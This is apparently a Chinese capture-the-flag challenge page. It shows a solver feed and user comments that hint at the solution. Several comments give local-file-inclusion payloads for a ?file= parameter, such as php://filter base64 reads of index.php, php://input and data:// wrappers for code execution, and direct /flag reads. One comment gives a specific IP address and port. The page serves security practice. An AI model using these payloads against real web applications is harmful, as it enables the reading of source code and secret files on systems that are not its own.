评分(11)
解题动态
JKyukino 攻破了该题 2小时前
liberator 攻破了该题 12小时前
daimaojiang 攻破了该题 17小时前
Oliver23 攻破了该题 1天前
l2 攻破了该题 1天前
dicer 攻破了该题 1天前
yyj 攻破了该题 1天前
NEIL. 攻破了该题 1天前
myj38 攻破了该题 1天前
鄂ANB666 攻破了该题 1天前
kobaikobai 攻破了该题 1天前
2406100127 攻破了该题 1天前
ashYuki 攻破了该题 1天前
LJsir 攻破了该题 1天前
bluesword 攻破了该题 1天前
easier 攻破了该题 2天前
ikunqq 攻破了该题 2天前
Anna-july 攻破了该题 2天前
lemion 攻破了该题 3天前
评论
帅帅123 16天前
举报
发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php
奔跑的开开 29天前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
ok了 2月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 秒了
VVang 3月前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 3月前
举报
猜flag位置,file=/flag
8208240204 4月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag
2686213396 4月前
举报
http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件
zhuizhui 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
17734916426 7月前
举报
index.php?file=/flag
shingu 8月前
举报
这题过于简单了。?file=/flag。